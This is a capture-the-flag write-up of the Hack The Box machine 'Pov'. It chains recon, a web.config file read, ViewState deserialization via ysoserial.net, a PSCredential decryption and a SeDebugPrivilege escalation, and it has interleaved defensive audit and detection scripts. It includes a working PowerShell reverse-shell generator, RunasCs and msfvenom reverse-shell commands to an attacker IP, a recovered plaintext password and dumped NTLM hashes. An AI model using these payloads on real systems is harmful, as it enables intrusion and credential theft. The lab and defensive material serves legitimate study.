HTB-Pov(Medium)

admin, 2024-01-30 08:48:40

Key points: web.config; ViewState deserialization exploitation; PSCredential; SeDebugPrivilege & winlogon.


Scan

┌──(kali㉿kali)-[~/Desktop/htb/pov]
└─$ sudo nmap -sC -sV -Pn 10.10.11.251
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-29 09:42 EST
Nmap scan report for pov.htb (10.10.11.251)
Host is up (0.34s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.95 seconds

Enum

Routine testing turned up nothing; the subdomain is where the interesting part is.

┌──(kali㉿kali)-[~/Desktop/htb/pov]
└─$ gobuster dns -d pov.htb -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     pov.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/amass/wordlists/subdomains-top1mil-5000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: dev.pov.htb

The page has an LFI: capture the request and change the file parameter. I'll only cover this part briefly. Look at files such as web.config, which contains the decryption key and the validation key (I forgot to take screenshots after finishing the box and couldn't be bothered to redo it, so the figure here is borrowed from another writeup), and so on.

ViewState

This can be attacked with the technique described here: https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret#for-.net-framework-greater-than-4.5

GitHub tool: https://github.com/pwntester/ysoserial.net?source=post_page-----75ab061c8adc--------------------------------

First generate a base64-encoded reverse shell (https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58#file-mkpsrevshell-py).

#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64


def help():
    print("USAGE: %s IP PORT" % sys.argv[0])
    print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")
    exit()


try:
    (ip, port) = (sys.argv[1], int(sys.argv[2]))
except (IndexError, ValueError):
    help()

# payload from Nikhil Mittal @samratashok
# https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
payload = payload % (ip, port)

# PowerShell -e expects UTF-16LE; strip the two-byte BOM that encode('utf16') prepends
cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmdline)

Put the generated base64 string into -c and run it.

.\ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1"  --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio/default.aspx" -c "powershell -e <base64 payload omitted>"

Put the result into Burp, replace the __VIEWSTATE parameter with it and send the request; this gives a reverse shell.
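The whole chain above works only because web.config exposed a static machineKey in plaintext to a file read. The following is an added example, not code from the writeup or from ysoserial.net: a small audit script that parses a web.config and reports the settings a defender should fix (static keys readable on disk, a legacy validation algorithm, ViewState MAC disabled). Both sample configs are constructed and the key values are placeholders, not the box's real keys.

```python
#!/usr/bin/env python3
"""Audit an ASP.NET web.config for the ViewState weaknesses the attack above relies on.

Added example, not code from the original writeup. It parses <machineKey> and
<pages> under <system.web> and reports what a defender should fix. The sample
configs are constructed; the key values are placeholders, not real keys.
"""
import xml.etree.ElementTree as ET

# Constructed sample: static keys in plaintext, legacy SHA1 MAC (the shape seen in the writeup).
WEAK_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validationKey="PLACEHOLDER_VALIDATION_KEY"
                decryption="AES" validation="SHA1" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""

# Constructed sample: machineKey section encrypted with aspnet_regiis -pe (protected configuration),
# so a file read returns only ciphertext.
PROTECTED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey configProtectionProvider="RsaProtectedConfigurationProvider">
      <EncryptedData>PLACEHOLDER_CIPHERTEXT</EncryptedData>
    </machineKey>
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""

# validation algorithms ASP.NET still accepts but that are not HMAC-SHA2
LEGACY_VALIDATION = {"MD5", "SHA1", "3DES", "AES"}


def audit_web_config(xml_text: str) -> list:
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    findings = []
    root = ET.fromstring(xml_text)
    mk = root.find("./system.web/machineKey")
    if mk is not None and not mk.get("configProtectionProvider"):
        for attr in ("decryptionKey", "validationKey"):
            # ASP.NET's default is "AutoGenerate,IsolateApps"; anything else is a static key on disk
            value = mk.get(attr, "AutoGenerate,IsolateApps")
            if "AutoGenerate" not in value:
                findings.append(
                    f"{attr} is static and stored in plaintext: any file read of "
                    "web.config lets an attacker forge or decrypt __VIEWSTATE"
                )
        if mk.get("validation", "HMACSHA256").upper() in LEGACY_VALIDATION:
            findings.append(
                f"validation={mk.get('validation')} is a legacy MAC; use HMACSHA256 or stronger"
            )
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false: __VIEWSTATE is accepted without any MAC check")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_WEB_CONFIG), ("protected", PROTECTED_WEB_CONFIG)):
        print(f"[{name}]")
        for finding in audit_web_config(cfg) or ["no findings"]:
            print("  -", finding)
```

The protected sample shows the mitigation that actually closes this hole: with the machineKey section encrypted via protected configuration (aspnet_regiis -pe), an LFI of web.config yields ciphertext rather than usable keys, and rotating the keys after any suspected disclosure invalidates previously forged ViewState.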


User

In sfitz's Documents directory there are some credentials for the user alaading.

PS C:\users\sfitz\documents> type connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password"><encrypted password omitted></SS>
    </Props>
  </Obj>
</Objs>

Try to decrypt this password; see this article: https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx?source=post_page-----75ab061c8adc--------------------------------

PS C:\users\sfitz\documents> $credential = Import-CliXml -Path C:\users\sfitz\documents\connection.xml
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().Password
f8gQ8fynP44ek1m3
PS C:\users\sfitz\documents>
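The SecureString inside a CliXml file is a DPAPI blob bound to the exporting user and machine, so only that user can decrypt it; that is exactly why a shell as sfitz was enough. The defensive counterpart is knowing where such files exist. The following is an added example, not code from the writeup: a scanner that walks a directory tree, recognises serialized PSCredential objects in CliXml files and reports the username and blob size so stray credential files can be removed and the credentials rotated. The sample file and directory layout are constructed, and the password value is a placeholder, not a real DPAPI blob.

```python
#!/usr/bin/env python3
"""Find PowerShell CliXml files that carry serialized PSCredential objects.

Added example, not from the original writeup. Export-CliXml stores the
SecureString as a DPAPI blob tied to the exporting user and machine, so the
file is only useful to that user, which is precisely who an attacker becomes
after landing a shell as them. This scanner lists such files for cleanup.
The sample CliXml is constructed; the blob is a placeholder, not real DPAPI data.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
PSCREDENTIAL = "System.Management.Automation.PSCredential"

# Constructed sample in the shape of the connection.xml above.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">PLACEHOLDER_DPAPI_BLOB</SS>
    </Props>
  </Obj>
</Objs>
"""


def credentials_in_clixml(xml_text: str) -> list:
    """Return [(username, password_blob_length)] for each PSCredential object in one CliXml document."""
    found = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return found  # not XML at all; nothing to report
    for obj in root.iter(f"{PS_NS}Obj"):
        # the <TN> block lists the object's type hierarchy; PSCredential appears there
        types = {t.text for t in obj.findall(f"./{PS_NS}TN/{PS_NS}T")}
        if PSCREDENTIAL not in types:
            continue
        user = obj.find(f"./{PS_NS}Props/{PS_NS}S[@N='UserName']")
        blob = obj.find(f"./{PS_NS}Props/{PS_NS}SS[@N='Password']")
        found.append((user.text if user is not None else None,
                      len(blob.text or "") if blob is not None else 0))
    return found


def scan_tree(root_dir: str) -> list:
    """Walk root_dir and return [(path, username, blob_length)] for every serialized credential."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                # utf-8-sig swallows the BOM that PowerShell writes at the start of the file
                with open(path, encoding="utf-8-sig", errors="replace") as fh:
                    head = fh.read(256)
                    if "schemas.microsoft.com/powershell" not in head:
                        continue  # cheap pre-filter: only CliXml carries this namespace
                    text = head + fh.read()
            except OSError:
                continue
            for user, blob_len in credentials_in_clixml(text):
                hits.append((path, user, blob_len))
    return hits


def demo() -> list:
    """Write the constructed sample into a temporary profile-like tree, scan it, return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = os.path.join(tmp, "Users", "sfitz", "Documents")
        os.makedirs(docs)
        with open(os.path.join(docs, "connection.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_CLIXML)
        return scan_tree(tmp)


if __name__ == "__main__":
    for path, user, blob_len in demo():
        print(f"{path}: PSCredential for {user!r}, {blob_len}-char DPAPI blob")
```

Run it against user profile directories (for example C:\Users) rather than the whole disk; the namespace pre-filter keeps it fast, and every hit is a credential that should either be moved into a proper secret store or rotated.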

Upload RunasCs and pop a shell as alaading.

PS C:\users\sfitz\desktop> wget 10.10.14.83:8000/RunasCs.exe -O RunanCs.exe
PS C:\users\sfitz\desktop> ls

    Directory: C:\users\sfitz\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/29/2024   6:54 AM          51712 RunanCs.exe

PS C:\users\sfitz\desktop> .\RunanCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.83:5555
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-52d73$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 5384 created in background.


Root

Checking privileges shows SeDebugPrivilege, which together with winlogon goes straight to SYSTEM. I looked up references and had it in seconds.

(One question here, though: why does the PowerShell spawned by RunasCs have SeDebugPrivilege while cmd does not?)
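From the defender's side, the interesting signal in this step is a non-administrative account holding SeDebugPrivilege at all: Windows records the privileges a new logon token carries in Security event 4672 and later enable/disable changes in event 4703 (when token-right auditing is on). The following is an added example, not from the writeup: a small detection that reads events in the style of a SIEM JSON export and alerts when SeDebugPrivilege reaches an account outside an expected set. The events are constructed and the expected-holder list is an assumption for the demo.

```python
#!/usr/bin/env python3
"""Flag SeDebugPrivilege landing in the hands of accounts that should not hold it.

Added example, not from the original writeup. Security event 4672 lists the
privileges a new logon token carries; 4703 records privileges being enabled or
disabled on a token, with the process that did it. The events below are
constructed JSON lines; the allowlist is an assumption for the demo.
"""
import json

# Assumption for the demo: only these accounts are expected to carry SeDebugPrivilege.
EXPECTED_DEBUG_HOLDERS = {"SYSTEM", "Administrator"}

# Constructed sample events; field names follow the Security log, values are made up.
SAMPLE_EVENTS_JSONL = r"""
{"EventID": 4672, "SubjectUserName": "SYSTEM", "PrivilegeList": "SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeDebugPrivilege"}
{"EventID": 4624, "SubjectUserName": "sfitz", "LogonType": 3}
{"EventID": 4672, "SubjectUserName": "alaading", "PrivilegeList": "SeDebugPrivilege"}
{"EventID": 4703, "SubjectUserName": "alaading", "ProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "EnabledPrivilegeList": "SeDebugPrivilege", "DisabledPrivilegeList": "-"}
{"EventID": 4703, "SubjectUserName": "Administrator", "ProcessName": "C:\\Windows\\System32\\taskmgr.exe", "EnabledPrivilegeList": "SeDebugPrivilege", "DisabledPrivilegeList": "-"}
"""


def parse_events(jsonl: str) -> list:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def privileges(field: str) -> set:
    """The Security log separates privilege names with newlines and tabs; split on any whitespace."""
    return set(field.split())


def flag_debug_privilege(events: list, expected=EXPECTED_DEBUG_HOLDERS) -> list:
    """Return (EventID, user, reason) for each event giving SeDebugPrivilege to an unexpected account."""
    alerts = []
    for ev in events:
        user = ev.get("SubjectUserName", "")
        if user in expected:
            continue
        eid = ev.get("EventID")
        if eid == 4672 and "SeDebugPrivilege" in privileges(ev.get("PrivilegeList", "")):
            alerts.append((eid, user, "new logon token carries SeDebugPrivilege"))
        elif eid == 4703 and "SeDebugPrivilege" in privileges(ev.get("EnabledPrivilegeList", "")):
            alerts.append((eid, user, f"SeDebugPrivilege enabled in {ev.get('ProcessName', '?')}"))
    return alerts


if __name__ == "__main__":
    for eid, user, reason in flag_debug_privilege(parse_events(SAMPLE_EVENTS_JSONL)):
        print(f"[{eid}] {user}: {reason}")
```

The 4672 rule is the low-noise one and fires once per logon; 4703 is far chattier on real hosts, so in practice it is worth restricting it to non-expected accounts as done here and pairing it with the process name, which is what turns "a user has SeDebugPrivilege" into "a shell just enabled it". The fix is the same either way: remove the privilege from the account, since SeDebugPrivilege is equivalent to local administrator.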

Switch my shell over to Metasploit to make process migration easier (from an interactive cmd, the built-in certutil.exe can handle the file transfer).

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.83 LPORT=6666 -f exe > shell.exe

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.83
set lport 6666
run


meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7c883121d0f63ee5b4312ba7572689b:::
alaading:1001:aad3b435b51404eeaad3b435b51404ee:31c0583909b8349cbe92961f9dfa5dbf:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sfitz:1000:aad3b435b51404eeaad3b435b51404ee:012e5ed95e8745ea5180f81648b6ec94:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1fa5b00b7c6cc4ac2807c4d5b3dd3dab:::

Originally published on the WeChat public account 搁浅安全: HTB-Pov(Medium)

Posted by admin on 2024-01-30 08:48:40. Please keep this link when reprinting (CN-SEC: thanks to the original author for their work): https://cn-sec.com/archives/2443653.html
